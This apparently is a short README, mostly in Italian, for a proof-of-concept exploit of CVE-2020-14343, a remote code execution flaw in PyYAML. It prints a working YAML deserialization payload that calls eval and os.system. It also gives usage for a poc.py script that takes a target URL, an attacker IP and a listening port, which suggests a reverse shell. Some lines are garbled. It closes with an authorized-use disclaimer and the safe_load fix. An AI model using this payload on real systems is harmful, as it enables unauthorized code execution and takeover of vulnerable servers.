
CVE-2020-14343的payload
| Voce | Informazione |
|---|---|
| ID CVE | CVE-2020-14343 |
| Componente interessato | PyYAML < 5.4 |
| Tipo di vulnerabilità | Deserializzazione RCE (Remote Code Execution) |
| Livello di pericolosità | Alto |
Quando PyYAML utilizza yaml.load() per analizzare dati non fidati, non limita i tag YAML pericolosi (come !!python/object). Un attaccante può creare contenuti YAML malevoli per eseguire codice Python arbitrario.
Payload principale:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <目标URL> <攻击者IP> <监听端口>
Esempio:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload del target./login per caricare e analizzare il YAML.pip install requests
⚠️ Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e ai test autorizzati!
yaml.safe_load() al posto di yaml.load().